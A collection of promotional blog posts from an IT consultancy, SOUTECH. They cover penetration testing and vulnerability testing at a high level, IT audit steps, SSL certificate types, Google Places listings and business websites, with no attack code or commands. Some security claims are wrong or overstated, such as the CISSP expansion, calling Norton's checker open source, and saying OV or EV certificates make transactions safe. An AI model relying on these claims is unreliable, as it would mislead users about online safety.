- Penetration of Applications: This is a very important step which involves an attempt to break into the applications because so many attacks are directly targeted at applications. Web applications such as HP’s WebInspect and IBM’s AppScan can be employed, but the tester can also find ways to exploit the application logic errors. Nothing stands a skilled application test because once an initial application is compromised, a direct access to the database where valuable data is easy. If the tester can access the database, then the customers system is owned already and scripts can be written to block every loop holes by the attacker.
- User Testing: This part of the penetration test is always fun for the penetration testers because they get to see how gullible and vulnerable most users are. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate their facilities. They even drop thumb drives at the parking lot and watch out for people that will plug them. Social engineering is one of the key ways of information gathering and should never be underestimated. Social engineering can be used on the client in order to catch them off guard.
Standards for Penetration Testing Methodologies
There are many accepted industry methodologies that may guide and help the pen tester through any test.
- Open Source Security Testing Methodology Manual (OSSTMM)
- OWASP Testing Guide
- The National Institute of Standards and Technology (NIST)
- Penetration Testing Execution Standard
- Penetration Testing Framework
These frameworks have set standards that any penetration testing activity should follow as should strictly be adhered to guide the pen tester whenever necessary.
A typical penetration activity is detailed and must be carried out in an organized fashion. This is because organisational data and assets are very important and delicate things to handle therefore there is a need to have an orgnised team of professionals to handle your penetration testing services.
We at SOUTECH web consults are the perfect consulting firm for carrying out your penetration testing. We have professional staff and a team to conduct a well detailed and professional penetration testing. Subscribe for our services today.
Pen tests as we already know are intended to identify and confirm actual security breaches and to report such issues to management. This ensures that an organization experiences a balance in business and a good network security to ensure the smooth operation of business.
Just to reiterate as this is a follow up article to my basics on penetration testing, penetration testing colloquially called pen test refers to an ethical hacking method which is used to perform security testing on a computer network of an organization. It involves a lot of methodologies which I have already explained in my previous write up which is designed to explore a network for potential known vulnerabilities and to test them if they are real. A properly performed penetration test allows a network professional to fix issues within the network in order to improve the network security and provide the needed protection for the entire network against future cyber-attacks and intrusions.
The terms vulnerability assessment and penetration testing are often confused and I have made an attempt to differentiate them because they mean different things.
Pen tests involve methods require using legal permissions to exploit the network while vulnerability assessment requires evaluating the network, its systems and services for potential security problems. While a pen test is designed to perform simulated attacks, vulnerability assessments only require pure analysis and vetting of an organizations network for vulnerabilities. Note that no attack is launched.
Penetration Testing Services
I will describe 4 distinct penetration testing service offerings that we can provide you
1.Vulnerability Scanning: This scanning technique provides a very transparent and mature offer but the biggest challenge always lies on whether to resell a service offering or to buy that can be used to internally scan the clients’ systems and networks. Every regulation requires scanning which is the first and easy step taken towards achieving security assurance. This is because all regulated customers need to scan.
2. Penetration testing of Infrastructure: This offers tools such as Metasploit or Core Impact, that can be used to perform live exploits. Live ammunitions are used so you have to orchestrate or organize the test with the client in such a way that the amount of disruption during the tests is minimized. The pen tester should endeavor to test all externally visible IP addresses because it is what the bad guys want in order to penetrate the system and network. The tester should also attach to the conference room network which is one of the softest parts of the customers’ defense.
3. Penetration of Applications: This is a very important step which involves an attempt to break into the applications because so many attacks are directly targeted at applications. Web applications such as HP’s WebInspect and IBM’s AppScan can be employed, but the tester can also find ways to exploit the application logic errors. Nothing stands a skilled application test because once an initial application is compromised, a direct access to the database where valuable data is easy. If the tester can access the database, then the customers system is owned already and scripts can be written to block every loop holes by the attacker.
4. User Testing: This part of the penetration test is always fun for the penetration testers because they get to see how gullible and vulnerable most users are. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate their facilities. They even drop thumb drives at the parking lot and watch out for people that will plug them. Social engineering is one of the key ways of information gathering and should never be underestimated. Social engineering can be used on the client in order to catch them off guard.
The Qualifications of a Penetration Tester
The task of penetration testing can be performed by a qualified third-party agent as long as they are organizationally independent. What I mean is that they must be organizationally separate from the management of the client or the target system. Example, if we use a case study of a PCI DSS company as our assessment entity and as the third-party company carrying out the assessment, they cannot conduct the pen test because they’re involved in the installation, maintenance or as support to the target systems.
The following guidelines can be useful in your choice for a good and qualified penetration tester
Certifications for a penetration tester: The certifications which a penetration tester hold is a very indicative guide to their level of competence and skill. While these certifications may not be required, they can indicate a common body of knowledge for the tester. These are the few among’st many certifications a penetration tester can have;
- Certified Ethical Hacker (CEH)
- Offensive Security Certified Professional (OSCP)
- Global Information Assurance Certification (GIAC)
- Computer Information System Security Professional (CISSP)
- GIAC Certified Penetration tester (GPEN)
- EC-Council Security Analyst (ECSA)
- Licensed Penetration Tester (LPT)
- GIAC Exploit Researcher and Advanced Penetration tester (GXPN)
Always remember that before any test begins, all parties are recommended to be involved such as the organization, pen tester, the assessor where applicable. They all must be aware of the types of test being performed i.e. external, internal, network layer or application and how the test will be performed and the target.
Steps to Perform a Detailed Penetration Testing
1.Scoping of the organization: The responsibility of the organization is to the adequately define the critical systems. The normal recommendation is that the organization works hand in hand with the pen tester whenever it is applicable. The assessor also plays major role here to verify that none of the components are overlooked and also to determine if there are additional systems to include in the scope. The scope of the penetration test should include the critical systems, the access points and the methods for segmentation.
2. Documentation: All components within the scope of the documentation should be made available to the tester whenever necessary. Documents include,
- Application interface documentation
- Guides to the implementation
This will help the tester to understand the functionality of the system. Other information which the organization needs to supply the tester should include
- Network diagram. showing all the network segments.
- Data flow diagram
- Detailed list of all services and ports that are being exposed to the perimeter.
- List of the network segments in isolation
The pen tester uses all this information to assess and identify all unexpected attack vectors and any insufficient authentication controls.
3. Rules of Engagement: Before any test begins, it is very important to agree and document on conditions and terms in which the test is being performed and the extent to the level of exploitation. This gives the pen tester the authority to the test environment and to make sure the organization has an understanding of test and what to expect from it. The following are what to consider as rules of engagement
- Window time will the test be performed?
- What are the known issues in the system and issues with automated scanning? And if so, will such systems still be tested?
- Any preferred methods of communication about the scope and any issues that will be encountered in the course of the test.
- Any security controls could detect the testing?
- Are there passwords or any sensitive data to be exposed during the test.
- If the equipment to be used by the tester will pose any threats to the systems in the organization.
- Any updated OSes, service packs and patches and if the tester should provide all the IP addresses for which the test will originate.
- What steps the tester should take when he detects any flaw or loophole.
- Will the tester retain any data obtained during the tester?
4. Third-party Hosted/Cloud environments: The following should be added to the rules of engagement.
- Before test commences, if the service-level agreement requires any approval from the third-party.
- Web management portals that are provided to manage the infrastructure by the third-party should not be included unless noted in the scope.
5. Criteria for success: Pen testing is supposed to simulate a real-world attack with the aim of identifying the extent an attacker can go to penetrate the systems. Therefore, defining the success criteria for the pen test will allow the entity to program limits for the pen test. Success criteria should be included in the rules of engagement and should include
- Restricted services or data should be directly observed in the absence of access controls
- Level of compromise of the domain being used by legitimate users.
6. Review of past vulnerabilities and threats: this involves a review and a consideration of all the threats and vulnerabilities that were encountered in the last 12 months. It is more like an historical look into the organizations environment since the last assessment was performed. This information is very important to give insights on how to handle the current vulnerabilities. Depending on whether it is a white box, grey box or black box test that is to be performed, these are not to be included in the review.
- Vulnerabilities being discovered by the organization and have not be solved within a certain time.
- Compensation controls preventing the discovered vulnerabilities
- Upgrades or deployments that are in progress
- Threats and vulnerabilities that have led to a possible data breach
- Valid remediation of pen test in the past years.
7. Segmentation: This is done by conducting test used during the initial stage of the network penetration such as port scans, host discovery. It is performed to verify that all the isolated LANs do not have access to the database. Testing each of these unique segments should ensure that security controls are working normally as intended. The pen tester should check the LAN segments that they have access to the organization and restrict access.
8. Post Exploitation: This means taking actions after an initial compromise of the system. It refers to the methodical approach of making use of pivoting techniques and privilege escalation to establish a new source of attack. This can be done from a vintage point in the system in order to gain access to the network resources.
9. Post- Engagement: the following activities should be done after the engagement or testing are being performed:
- Remediation best practices
- Retesting all the identified vulnerabilities
10. Cleaning up of the work Environment: After the pen test has been performed, it is necessary to do a thorough cleanup of the working environment. The tester does some documentation and informs the organization of any alterations that have been made to the environment. These include but not limited:
- Installed tools by the tester on the organizations system
- Created accounts during part of the assessment
- Changed passwords for accounts
- Any additional documents not related to the organization
11. Reporting and Documentation: Report helps an organization in their efforts to improve upon their security posture and also to identify any areas that are vulnerable to threats. A report should be structured in a such a way that it the test is clearly communicated, how it was carried out. The report should be done in the following steps;
- Report identified vulnerabilities
- Any firewall mis-configurations
- Report of detected credentials that were obtained through manipulation of the web application.The service of penetration testing is a typical learning experience for everyone in the organization that is involved in it as well as the tester. The testers get to discover and learn what it is that works and what does not work and is not obtainable to the entity being tested. They can also learn how to find ways to adapt to the defenses of the customer. The client i.e the organization gets to learn of what they should have known and done that is less effective and finally learn and appreciate what is applicable. The pen tester now tries to pick the pieces and build a strong and long-term relationship with the client.
We at soutech web consults are the perfect consulting firm for carrying out your penetration testing. We have professional staff and team to conduct a well detailed and professional penetration testing. Subscribe for our services today.
First of all, let us understand what a vulnerability is. I’ll define a vulnerability as any form of loophole, a weakness or mistake that can be found in a system security design, its implementation, security procedures, or its control that can lead to systems security policy violation. A vulnerability can make it possible for cybercriminal or attacker to gain unauthorized access to the system.
As we already know, confidentiality, integrity and availability which are the three cores of IT security. Once any or all of these elements are compromised, then one can say there is a security vulnerability. Infact, a single security vulnerability has the potential of compromising one or all of these elements. For example, the confidentiality can be compromised if there is an information disclosure vulnerability while the compromise of integrity and availability can be as a result of remote code execution.
What is Vulnerability Testing?
It can also be referred to as vulnerability assessment which is a software testing technique that is conducted in order to evaluate the inherent risk in an IT system and measures employed to reduce or curb the probability of the event.
Vulnerability testing has some similarities with risk assessment and these assessments can be performed following some steps as highlighted below.
- Developing a catalogue for assets and resources in the system.
- Assigning rank orders to quantify resources by value and importance.
- Identifying the potential threats and vulnerabilities to the resources.
- Eliminating totally or mitigating the high ranked vulnerabilities for the most valuable resources.
Vulnerability testing depends majorly on 2 mechanisms
- Vulnerability assessment
- Penetration testing
Objectives of Vulnerability Testing
The common goals and objectives of risk and vulnerability assessments are as follows;
- To get an accurate inventory of all data and IT assets.
- To prioritize organizational IT and data assets according to the importance and criticality to the organization
- To identify and document all the potential risks, threats and vulnerabilities to the organizational infrastructural assets.
- To prioritize the potential risks, threats and known vulnerabilities based on their impact or criticality on the IT or data assets being affected.
- To identify and minimize the vulnerability window of the organizational IT and data assets according to the minimum acceptable tolerance level.
- To curb, mitigate or remediate the identified risks, threats and vulnerabilities and properly plan and budget them based on the criticality of the IT and data assets.
- To check for compliance with the updated information security laws, regulations, procedures and mandates
- Just as explained previously, it helps to identify lapses, voids and gaps in the organizations IT security framework and architecture by looking out for specific recommendations.
- To identify the potential risks, threats and vulnerabilities that an organization’s is susceptible to and to find ways to justify the cost of all the security countermeasures and solutions to be adopted in order to mitigate, eliminate or reduce the identified risks, threats and vulnerabilities.
- To provide an objective assessment and prompt recommendation to help define the organizations goals and objectives for performing risk and vulnerability assessment.
- It helps organizations to understand the return on investments (ROI) whenever funds are to be invested in the IT security infrastructure.
- To scan operating systems, application softwares and the entire network for known vulnerabilities such as insecure authentications and software designs.
Scope of Vulnerability Testing
- Black Box Testing: It involves performing vulnerability testing from an external network with no prior knowledge of the internal network infrastructure and systems.
- White box testing: It involves performing vulnerability testing within an internal network with prior knowledge of the internal network infrastructure and systems. White box testing can also be referred to as internal testing.
- Grey box testing: It involves performing vulnerability testing from either an external or internal network with little knowledge of the internal network infrastructure and system. It involves the combination of black box ad white box testing.
Elements of Vulnerability Testing
- Information Gathering: This can also be referred to as reconnaissance and it deals with obtaining as much information as possible about an IT environment. Information such as Networks, IP addresses, versions of operating systems in use etc. and it is applicable to the 3 scopes of vulnerability assessment.
- Detection of vulnerability: This process involves the use of vulnerability scanners to scan the IT environment to identify the unknown and potential vulnerabilities.
- Information analysis and planning: It involves the analysis of all the vulnerabilities that have been identified and further devising a means to penetrate into the network and the systems.
Types of Vulnerability Test
- Predefined Tests: These is a vulnerability test that is designed to discover some common vulnerabilities in databases and its environments. Predefined tests can be customized to suit the needs or requirements of an organization. Predefined tests include;
- Configuration Tests: It checks a database for all configuration settings realted ti security. It looks out for common flaws and mistakes in database configurations. Such configuration issues include;
- Privelege which include; system level rights, privilege access to database and users, rights of use and creation of objects
- Configuration: Which include parameter settings for the database and parameter settings for the system level.
- Authentication: It includes, use of accounts by users, use of remote logins, password policies.
- Version: This includes, versions of the database and patches for the database.
- Object: It involves sample databases that have been installed, database layouts that have been recommended and ownership of the databases.
- Behavioral Tests: This test type checks and analyses the security posture and wellbeing of the database environment. It does this by observing the database when it is in real time mode and checking how information is manipulated. Some of the behavioral tests include;
- Violations of access rules
- Failures in excessive logins
- Errors in the excessive SQL
- Access to default users
- Logins at after hours
- Execution of DDL, DBCC commands from the client side of the database
- Calls for stored procedure checks
- Ensures user ids are not accessed from multiple IP addresses
- Query- based vulnerability tests: This test type can either be a pre-defined test or a user-defined test that can be created easily and quickly by modifying SQL queries which can be run against database entities or resources.
- CVE (Common Vulnerabilities and Exposures) Tests: This test type monitors and exposes common vulnerabilities from the MITRE corporation and further adds the results of the test for related vulnerabilities that are related to the database.
- CAS-based Tests: This test type can either be a predefined test or a user-defined test which is based on the template of a CAS item found in the OS script command. It uses the collected data. Users can therefore check which of the template items and tests against the contents in the CAS results.
Vulnerability Testing Methodologies
- Begin the documentation process of all assets
- Secure permissions to credentials and assets
- Perform tools update
- Configure the tools
- Execute the Test
- Run the tools to begin execution
- Run all the data packets captured (A packet is a unit of data that is crafted to be routed from a source to destination). If a file whether email, HTML, or URL request is being sent from a particular point to another on the internet, the TCP layer of TCP/IP will divide the file into small chunks each having a sequence number on the headers for efficient routing. Now, these small individual chunks are referred to as packets. On the destination end, the packets reassemble to form the original file that was sent while running the assessment tools.
- Analyze the vulnerabilities:
- Define and classify the system resources as well as the network
- Prioritize the resources based on their importance such as High, Medium, low
- Identify all potential threats to the assets
- Based on the priorities, develop a strategy to first handle the most prioritized problems
- Define and implement measures to mitigate or minimize the consequences of the occurrence of an attack.
- Form a Report: Develop a report of all the steps you took to arrive at your results. The report is also important in order to guide to aid future understanding of the system and as well to report to the management of the organization.
- Remediation plans: This process involves developing measures and taking the appropriate steps to fix the vulnerabilities.
Responsibilities of a Vulnerability Tester
- Unit management such as Information Security Coordinators and Unit IT supervisors
- They support and enforce the standards, approve and submit the annual risk assessment documents to management
- They determine the person who maintains the documentation.
- They also request for the internal audits, procure and assign the necessary resources that are needed to implement the standards and polices.
- They notify the users and support staff who are involved in performing the test.
- The also request for any exceptions
- They supervise and coordinate the vulnerability test and also the remediation processes.
- The System administrator and Computing device Administrator
- They implement the best practices which are needed to comply with the test.
- They support and comply with the policies.
- They scan all the systems in the network for compliance to standards devices.
- They monitor the systems actively for any available patches in other to remediate tasks that can affect the user.
- Information security Officer
- These people approve and oversee the all the vulnerability scans.
- They review and approve the use of any alternative scanning tools when required.
- They conduct reviews and risk assessments annually.
- They authorize the removal of network devices from the network when needed.
Vulnerability testing focuses more on determining loopholes and weaknesses in an IT infrastructure. In my next article i will try to shed some more light on the tools which can use to perform vulnerability since we already have the standard methodologies to follow in order to perform a detailed vulnerability test.
Soutech ventures offers courses that can better equip and train you on all you need to know with practical hands-on knowledge on vulnerability assessment. Subscribe to our CEH course today on www.soutechventures.com/courses
IT audit attempts to evaluate the controls surrounding data as it relates to confidentiality, integrity, and availability. IT audits ensure that confidentiality of information, ensures the integrity and availability which is a key factor to recovering from an incident.
This is a follow up article to on IT audits but I will be dissecting more on the methodologies and steps to performing audits
One of the challenges that audit managements and IT auditing have faced overtime is that it ensures IT audit resources are readily available to conduct IT audits. It audits require a lot of technical skills unlike financial audits, for example, an IT auditor will need a lot of training in web applications in other to audit a web application. Likewise, if they want to an oracle audit, they need to be trained efficiently as well as Windows platforms.
Another problem that audit management faces is in the management of IT auditors, because this because they have to track the timing when compared with the objectives of the audit as well as follow-up time on the measures of corrective actions that the clients take when responding to any previous recommendations and possible findings.
One of the important factors in IT auditing and one in which audit management struggles with consistently, is to ensure that adequate IT audit resources are available to perform the IT audits. Financial audits quite unlike IT audits are very intensive in terms of knowledge, for example, if an IT auditor is performing a Web Application audit, then they need to be trained in web applications; if they are doing an Oracle database audit, they need to be trained in Oracle; if they are doing a Windows operating system audit, they need to have some training in Windows and not just XP, they’ll need exposure to Vista, Windows 7, Server 2003, Server 2008, IIS, SQL-Server, Exchange.
Another factor that audit management faces is the actual management of the IT auditors, for not only must they track time against audit objectives, audit management must allow for time to follow-up on corrective actions taken by the client in response to previous findings and/or recommendations.The following are the things that an IT expert needs to do before beginning an audit;
- Perform a review of the organizational structure of the IT assets
- Perform a review of all IT policies and procedures
- Perform a review of all the IT standards
- Perform a review of the IT documentations
- Perform a review of the organization’s BIA
- Conduct an interview the authorized personnel
- Observe and monitor the processes and the performance of the employees
- Examine the testing of controls, and the results gotten from the tests.
Steps to Perform IT Audits
1. Understand the Audit Subject Area
- Perform a tour of all the facilities related to audit
- Perform a review of the background materials
- Review the IT and business strategic plans
- Conduct an interview for the key managers in order to understand business
- Review audit reports that have been in existence
- Identify regulations and where they have been applied
- Identify the areas that have been outsourced
2. Perform an Audit Engagement Plan Vocabulary
Subject of the Audit: The area that is to be audited. An example is the information systems related to sales
The objective of the Audit: The purpose of performing the audit. An example is determining if the sales database is safe against data breaches, due to inappropriate authentication, access control, or hacking.
Scope of the Audit: Streamlining the audit to a specific system, function, or unit, or period of time. An example is the is determining if the scope is constrained to Headquarters for the last year.
3. Perform Risk Assessment: Risk-Based Auditing
Check Inherent Risk: Determine the susceptibility of the system to a risk. An example is a bank’s inherent risk of being robbed.
Control the risk: If a problem exists that will not be detected by an internal control system. Still using the bank case as an example, if a thief accesses a customer’s account at Money Machine and is not detected
Detection of Risk: An auditor does not detect a problem that does exist. Example as in the case of the bank, if a fraud takes but it is not detected.
Perform an overall risk auditing: Combine all the audit risks.
4. Audit Engagement Risk Analysis
5. Prepare an Audit Engagement Plan
- Develop a risk-based approach
- Include audit objectives, required resources, timing, scope
- Comply with all applicable laws
- Develop an audit program and procedures
6. Add Detail to Plan
7. Evaluate Controls:
8. Classification of IT controls
- Corrective controls: It involves fixing the problems to prevent future problems by using:
- Contingency planning
- Backup procedures
- Detective Controls: These involves finding any form of fraud when it occurs using:
- Hash totals
- Check points
- Duplicate checking
- Error messages
- Past-due account reports
- Review of activity logs
- Preventive Controls: Preventive control measures include:
- Programmed edit checks
- Encryption software
- Access control softwares
- A well-designed set of procedures
- Physical controls
- Employ only qualified personnel
9. Evaluate Controls: Simple Control Matrix
- Test the Vocabulary
Compliance Testing: A compliance test should take this form
- Are there controls in place and are they consistently applied?
- Check access control
- Ensure program change control
- Procedure documentation
- Program documentation
- Software license audits
- System log reviews
- Exception follow-ups
Substantive Testing: Check the following:
- Are transactions processed accurately?
- Is data collected correct and accurate?
- Double check processing
- Calculation validation
- Error checking
- Operational documentation
If the results for the compliance testing are poor, the substantive testing should increase in type and sample number.
Compliance Testing: It should check the following
- Control: Is production software controlled?
- Test: Are production executable files built from production source files?
- Test: Are proper procedures followed in their release?
- Control: Is access to the sales database constrained to Least Privilege?
- Test: Are permissions allocated according to documentation?
- Test: When persons gain access to the database, can they access only what is allowed?
- Audit: Is financial statement section related to sales accurate?
- Test: Track the processing of sample transactions through the system by performing calculations manually
- Test: Test error conditions
- Audit: Is the tape inventory correct?
- Test: Search for sample days and verify complete documentation and tape completeness
Tools for IT Audits
ISACA has Standards and Guidelines related to Audit
- Section 2200 General Standards
- Section 2400 Performance Standards
- Section 2600 Reporting Standards
- Section 3000 IT Assurance Guidelines
- Section 3200 Enterprise Topics
- Section 3400 IT Management Processes
- Section 3600 IT Audit and Assurance Processes
- Section 3800 IT Audit and Assurance Management
- Translate the basic audit objectives into specific IT audit objectives
- Identify and select the best audit approach to verify and test controls
- Identify individuals to interview
- Obtain departmental policies, standards, procedures, guidelines to review
- Develop audit tools and methodology
IT General Controls Check List
1. Documentation of employees and the organization
- Draw an organizational Chart
- IT Department
- Current Phone List/Company Directory
- Job Descriptions for the IT Department
- Sample of Employee Evaluation Form
- List of all the terminations/ disengagements in the last 12 months.
- Checklist of newly hired employees
- Termination Checklist
- IT Project List – Is it being planned, completed in the last 12months on its ongoing?
- Review of the past year’s management response letter
2. Documentation of IT policies and procedures
· Obtain a network architecture diagram and documentation
· Obtain a network diagram
· Obtain a diagram and Lists of hosts and servers that are running financial applications
· Change the management policies and procedures
· Make an inventory of network hardwares and softwares
· Determine the computer operations, its policies and procedures
· Layer down security policies
· Enforce password policies
· Acceptable Use Policy
· Layer down incident response policies
· Get a curriculum for security awareness training
· Configure firewalls and rule sets
· Obtain software policies and procedures
· Setup remote access policies
· Setup policies for emails, instant messaging, internet usage
· Develop a disaster recovery and business contingency plan
· Setup policies for data backup and data recovery
· Get backup logs
· Offsite Tape Rotation Logs
· Obtain a listing of IT related insurance coverage
· Get copies of vendor contracts and service level agreements
· Deploy an organized Help Desk with help desk request tracking forms and trouble tickets
· Report open and closed tickets
· Employ batch processing
When performing an IT audit, the responsibility of the auditor general is to check if the IT system complies with government IT policies, procedures, standards, laws and regulations. Also, the auditor general should endeavor to use IT audit tools, technical guides and recommended resources by ISACA where appropriate. The resources recommended by ISACA (Information systems Audit and control association should encourage IT audit staff and the team as a whole to be certified. Certifications include but a few;
- CISA (Certified Information systems Auditor)
- CIA (Certified Internal Auditor)
- CISM (Certified Information Security Manager)
- CGEIT (Certified in the Governance of Enterprise IT)
The Audit reports
After a successful audit process, the IT auditor needs to do a detailed documentation. Here is a list of a few things an auditor needs to include in the audit.
- Plan and prepare the scope and objectives for the audit
- Describe the scope of the audit area
- Draft and audit program
- Get down the steps performed and gather the audit evidence of the audit
- If the services of other auditors and IT experts were used and what their contributions were.
- Document your findings, make conclusions and recommendations
- Document the audit in relation with document dates and identification
- Report obtained as a result on the audit performed
- An evidence of the review for audit supervisory
The audit results should be submitted to the organization upon exit where you can take out time to discuss in details your findings and recommendations. You should be certain of the following;
- That all the facts and findings noted down on this report are accurate
- That the recommendations you’ve made are cost-effective, more realistic and there are alternatives which should be negotiated with management
- That the dates for the recommended implementation will be agreed.
There are some other things you need to consider when you’re preparing to present your final report. You need to consider the audience and if the presentation is going to be done to the audit committee. The audit committee may not be really notice the minutia that goes into the business report. Your report should be done in a timely manner so as to give way for any form of corrections.
Finally, if you come across a significant finding in the course of the IT audit, you should inform management immediately.
Always subscribe to Soutech Ventures where we can handle all your IT solutions especially in the areas of IT audits.
Also enroll for a cyber security, ethical hacking training at SOUTECH.
Secure Connections: What you need to know about SSL Certificates: SOUTECH Cybersecurity Tips and training in nigeriaEsang U. E
The first purchase using an online transaction took place in a pizza hut, where the customer purchased a large pepperoni pizza with extra cheese and mushrooms. But 20years later on, ecommerce has become a bustling economy with over $1.2trillion sales in the year 2013.
The growth in online purchases was solidly built on the foundation of trust. By this I mean that people have grown to trust that when they make purchases on websites, these websites are proven to be legitimately and largely secured because of the Secure Socket Layer (SSL) certificates often found on the URL bar of your browser as a little green padlock.
An SSL certificate indicates first of all that there is a secure connection between your personal device and the company website. It also verifies that the provider is who they claim to be. It is very important that you understand the role of an SSL certificate to prevent you from being a prey to scammers and cybercriminals. This is because, not all the sites you visit that have SSL certificates as protection are created equal.
Certificate Authorities are known to provide SSL certificates and website owners purchase SSL certificates from these Certificate Authorities (CA). Different types of SSL certificates provide different levels and layers of security but there have been issues overtime. The issue is that in as much as these certificates provide that safety padlock that you have on your browser along with HTTPS (where “S” means “Secure”) also found on the address bar, the security levels provided by these certificates differ to a large extent. This is the reason why I’m trying help you understand what type of SSL certificate a website uses especially when you want to do any financial transactions and anything that is related to your personal financial credentials.
I’ll throw some more light on the types of certificates and how they work.
Types of Certificates
- Domain Validator (DV): The domain validator simply verifies the owner of a site. In this case, the CA just has to send an email to the email which the website was registered with. This is done in order to verify the identity of the website owner. Many cybercriminals make use of the domain validator because they can obtain it easily and by so doing make the website appear to be very secure a lot more than it actually seems. Over time, cybercriminals have taken to using DV certificates to lure users to phishing websites i.e. websites that look legitimate but are crafted for the sole purpose of stealing a user’s sensitive data.
- Organizational Validators (OV): The process of obtaining an OV takes a longer period. For and OV certificate to be obtained, the CA needs to validate some basic information such as the organization, the physical location of the organization and its website domain.
- Extended Validator (EV): This is the highest level of security and often the easiest to identify with. The process of issuing an EV certificate tries to increase the level of confidence in the business by making the CA perform an enhanced review of the applicant. This process of review involves an examination of corporate documents, confirmation of the identity of the applicant and the checking through the third party’s database for information. This adds on the browser of the URL, the “S” that is a part of HTTPS, the company’s name in green and also the padlock.
Now take at these URLs and try to notice the difference. Now the first is the DV certificate, the second is an OV certificate which actually looks like the first. Only difference is the “.” Before the com.
Now the last one clearly is an EV certificate.
What can you do to be safe?
Now that you know what an SSL certificate is, its importance as well as the three different types. You have also known that an DV- enabled site poses a huge risk to be scammed, I’ll give out a few tips on how to reduce the risk when performing any form of online transaction that involves your sensitive credentials.
- Be Alert: Now the fact that a website has a padlock or HTTPS just by to its URL is not a guarantee that it is certified safe for financial transactions. Users are used to looking out for these two things before performing any transaction which is the more reason why the cybercriminals go through the trouble of obtaining the SSL certificates to which is obviously make it look legitimate.
- Look out for the SSL certificate type that a website has: The first thing you should do is to look for any visual cues that indicates security like a green color and a lock symbol in the address bar of your browser. Just a quick reminder once again that it is only an EV-enabled website that has the company name in the address bar. However, browsers do not clearly display the difference between a DV and an OV certificate so to enable you tell the difference, there is an open source tool (https://safeweb.norton.com/) developed by Norton that can help you. All you have to do is to simply copy the URL paste it directly into the tool. The tool will tell you if the site is a DV, OV or EV-enables and more explicit results to tell you if the site is legitimate and safe.
- Perform transactions only on OV and EV-enabled websites: If you analyze the URL on the tool I just explained above, and it gives you a result saying that the site has a DV certificate, have a rethink as regards conducting any transaction with that site. Now if it is an OV or EV-enable site, then you can conduct your transaction with confidence that your business information is safe.
The deployment of online transactions has come to stay and will not be phased out anytime soon. People will have to bear with the crude task of combatting with cybercriminals as regards phishing. I will tell you that knowing the risk before time keeps you knowledgeable on becoming a victim of phishing websites.
ADDING YOUR BUSINESS TO GOOGLE PLACES.
Adding your business or services on Google Maps enhance online visibility even if your business is entirely mobile or online. If you aren’t operating a brick-and-mortar storefront, though, you may not want to post an address — and you don’t have to. Adding your business on Google Maps is simply done by setting up a profile in Google Places for Business. During this process, you can choose to suppress your street address and list service areas instead.
CREATE A GOOGLE PLACES PROFILE
First you must have a Google account, sign in to Google Places for Business with your valid Google account. If you don’t have a Google account, you can create one for free.
Your business phone number is a primary contact information especially if you are running a mobile or online business. You will need to provide your business phone number for easy identification of your business or services.
Also needed is some Basic Information which includes your business address. Google will require that you submit a valid mailing address for your business. You can disguise this address from searchers, however, you can also use a different criterion like “service areas” to define your location on Google Maps.
MORE ABOUT YOUR SERVICES
Choosing the “service areas” option means your business serves customers at their locations” in your chosen service areas. This option is available if you do not want your address to be listed. Off course, you will have to indicate the distance you can cover from one location if you offer mobile services.
The list of areas served option enables you to choose cities, states and countries you have or you serve, a good way of letting Google speak on your behalf.
Hours of operation, payment options, photos, videos and more can also be added to enhance visibility and inform your customers accordingly. Remember, your listing is advertising, so the more information you add to your profile, the more effective it will be.
VERIFICATION AND APPROVAL
Google will send you a personal identification number (PIN), to the mailing address you choose, of which you will use to complete the verification process in order to properly publish your listing.
One Google business listing is all you need irrespective of the numerous services and cities that you serve. You can always update services areas.
If you have a website already, I recommend listing your business or services on Google as the first step in SEO, otherwise you should really consider having a website for your business.
Content Development and consistent blogging in a systematic and scientific way will get you to google no 1 position.
ARE YOU READY TO GO GLOBAL?
You can visit www.soutechventures.com to learn more on how to promote your business and services using digital capabilities. At Soutech we provide ICT solutions that generate desire ROI for both individuals and organisations that tends to benefit from digital solutions. We also offer training that will empower you with different skills that could fine-tune your careers. Visit www.soutechventures.com/courses for more information.
REASONS WHY YOUR BUSINESS NEEDS A PROFESSIONAL WEBSITE!
- YOUR SMALL BUSINESS WILL GAIN CREDIBILITY
It is very obvious that consumers use the internet more often to search for the products or services they need. Your small business will gain credibility by having a website. Without one, potential customers will go to your competitors that do. Let’s say you have a website already, well, it is important to have it professionally redesigned in order to provide your business with a professional image which will inspire even greater confidence. For home-based businesses, this is particularly beneficial since you do not have a store front to promote your products or services.
- A WEBSITE SAVES YOU MONEY
Do not think that you cannot afford a professional website as a small business owner, what you cannot do is not to afford. Although the cost of designing a website varies, once it’s up and running, a website for a small business generally costs under N100,000 a year and, in some cases, as little as N40,000. Compared with the cost of a newspaper ad, when you consider the potential market you can reach with a website, it is a very cost effective way to promote your business.
- IT WILL ENABLE YOU TO KEEP YOUR CUSTOMERS INFORMED
Think of your website as being your online brochure or catalogue. Updating information about your product and services is way much easier and quicker on a website than in print material, making it an effective way of letting your customers know about the arrival of new products, upcoming events, special promotions, or any new services you now offer. You website can provide and maintain current information and news unlike printed information and ads which quickly become outdated.
- IT IS ALWAYS ACCESSIBLE
A website is available to both your regular and potential customers 24/7/365 providing them with the convenience of reviewing your products and services when your store or office is closed. With today’s busy lifestyles, this is a great selling point when making a purchase decision.
- A WEBSITE MAKES IT POSSIBLE TO TARGET A WIDER MARKET
Whether you provide products or services, your website will provide an alternative location to sell them. As a retailer, having a website (eCommerce) is a great place to sell your products to a wider market; even services can be made available globally. Don’t think you’ll be able to sell your products or services online? Don’t forget, even cars and houses sell online!
- IT PROVIDES A PLATFORM WHERE YOU CAN SHOWCASE YOUR WORK
No matter what type of business you’re in, a website is a great place to showcase your work. By including a portfolio or image gallery, as well as testimonials about your work, you can demonstrate what makes your business unique.
- A WEBSITE SAVES YOU TIME
Having an online catalogue or portfolio saves you a lot of time which you will experience if providing information phone, face-to-face, in a brochure, or in emails. With an online catalogue you can provide lots of information about your products and services. Once your website launch, it is available to your customers indefinitely, saving you time. And what is time? Time is money!
- IT IMPROVES CUSTOMER SERVICE
Assuming you sell ecological friendly products and would like to share some guidelines and tips on how to recycle, or possibly you’re an accountant and decides to give your clients advice on how to simplify their bookkeeping practices. You can keep your customers up-to-date by including a (frequently asked questions) FAQ page, adding articles or uploading newsletters to answer all your customers’ questions. Sharing information on your website is a better way to provide them with value added.
- IT IS SIMPLE AND EASY TO GET A PROFESSIONAL WEBSITE
Have you heard of Soutech Web Consult? Oh you should if you really want to globalise your business and services. Long story short, visit Soutechventures.com.
